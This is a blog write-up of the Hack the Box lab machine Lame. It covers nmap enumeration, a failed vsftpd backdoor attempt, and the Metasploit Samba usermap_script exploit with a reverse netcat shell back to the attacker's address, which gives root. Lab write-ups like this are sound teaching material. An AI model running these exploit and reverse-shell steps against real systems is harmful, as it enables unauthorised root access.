/ hacking

Hack the Box Writeup - Lame

As my last guide was unexpectedly popular (thanks mostly to a retweet by @hackthebox_eu, I figured I should get on and write another one; this time for Hack the Box retired machine, Lame.

Note: You can find my guide to Shocker here and my guide to Beep here.

Enumeration

So we begin, as always, with our initial nmap scan.

$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.3

First look shows that there is an FTP service running which allows anonymous login, so lets take a peek and see what we can find.

ftp

Which unfortunately appears to be nothing :(

However, the nmap scan revealed the version of FTP software running is vsftpd 2.3.4. A quick searchsploit shows that this version of the software has a backdoor command execution vulnerability. Let's see if we can take advantage of this.

searchsploit

Looking at further information about this exploit shows it is a metasploit module, so lets fire up msfconsole and give it a whirl.

metasploit_fail

Lame indeed. It seems that while vsftpd 2.3.4 does have a backdoor command execution, this particular version must have been patched. So let's go back to our nmap scan and look for other attack vectors.

Our next likely candidate for attack presents itself, as the ports for Samba are open. These are always good to have a poke at given the history of security issues that have come up with Samba over the years.

samba_version

Nmap has a number of scripts we can run to check for Samba vulnerabilities, so that's what we will try first.

$ nmap --script smb-vuln* 10.10.10.3 --script-args=unsafe=1 -p 445 10.10.10.3

Unfortunately this also fails to find anything. However, taking the version number of Samba running from our initial nmap scan (3.0.20), we can run searchsploit which does present us with another likely candidate.

searchsploit2

The second entry is a remote heap overflow so unlikely to help us here, but the first one looks more promising. It's another metasploit module, so let's fire up msfconsole again and give it a go.

Exploit

We run the following:

> use exploit/multi/samba/usermap_script
> set rhost 10.10.10.3
> set payload cmd/unix/reverse_netcat
> set lhost 10.10.14.15
> exploit

And straight away we get a root shell, along with access to both flags :)

root_shell-1

Dean Williams

Dean Williams

OSCP, Application Developer, Database Administrator, Wannabe Snowboarder & Imposter Syndrome Sufferer

Read More